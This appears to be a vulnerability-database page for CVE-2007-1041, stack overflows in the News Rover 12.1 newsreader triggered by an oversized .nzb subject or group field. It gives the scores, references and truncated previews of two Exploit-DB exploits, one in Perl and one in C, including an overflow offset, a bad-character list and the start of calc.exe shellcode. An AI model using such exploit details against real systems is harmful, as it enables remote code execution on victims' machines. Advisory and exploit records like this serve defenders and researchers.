CVE-2007-1041
published 2007-02-21CVE-2007-1041: Multiple stack-based buffer overflows in S&H Computer Systems News Rover 12.1 Rev 1 allow remote attackers to execute arbitrary code via a .nzb file with a…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.90%
93.3th percentile
Multiple stack-based buffer overflows in S&H Computer Systems News Rover 12.1 Rev 1 allow remote attackers to execute arbitrary code via a .nzb file with a long (1) group or (2) subject string.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sandh | news_rover | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
News Rover 12.1 Rev 1 - Stack Overflow (2)
exploitdb·2007-02-24
CVE-2007-1041 News Rover 12.1 Rev 1 - Stack Overflow (2)
News Rover 12.1 Rev 1 - Stack Overflow (2)
---
#!/usr/bin/perl
# ===============================================================================================
# News Rover 12.1 Rev 1 Remote Stack Overflow perl exploit
# By Umesh Wanve ([email protected])
# ==============================================================================================
# Credits : Originally discovered and coded in c by Marsu
#
# Reference : https://www.securityfocus.com/bid/22618
#
# Date : 24-02-2007
#
# This is converted into perl for perl lovers.
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer overflow exists in Subject parameter of the .nzb file
# By Passing more than 2022 bytes we can able to
Exploit-DB
News Rover 12.1 Rev 1 - Stack Overflow (1)
exploitdb·2007-02-20
CVE-2007-1041 News Rover 12.1 Rev 1 - Stack Overflow (1)
News Rover 12.1 Rev 1 - Stack Overflow (1)
---
/*********************************************************************************************\
* *
* News Rover 12.1 Rev 1 Remote Stack Overflow exploit *
* Coded and discovered by Marsu *
* *
* Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P *
\*********************************************************************************************/
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
/* win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
/* BAD CHARS ARE 0x00 0x3c 0x3d 0x3e 0x3f 0x0a 0x0d 0x22 0x25 0x26 0xA7 0x8a. Maybe more... */
char calcshellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
"\xb2\x82\x70\x83\xeb\xfc\xe2\xf4\x58\x5a\xc6
No writeups or analysis indexed.
http://osvdb.org/33253http://secunia.com/advisories/24216http://www.securityfocus.com/bid/22618http://www.vupen.com/english/advisories/2007/0663https://exchange.xforce.ibmcloud.com/vulnerabilities/32576https://www.exploit-db.com/exploits/3342http://osvdb.org/33253http://secunia.com/advisories/24216http://www.securityfocus.com/bid/22618http://www.vupen.com/english/advisories/2007/0663https://exchange.xforce.ibmcloud.com/vulnerabilities/32576https://www.exploit-db.com/exploits/3342
2007-02-21
Published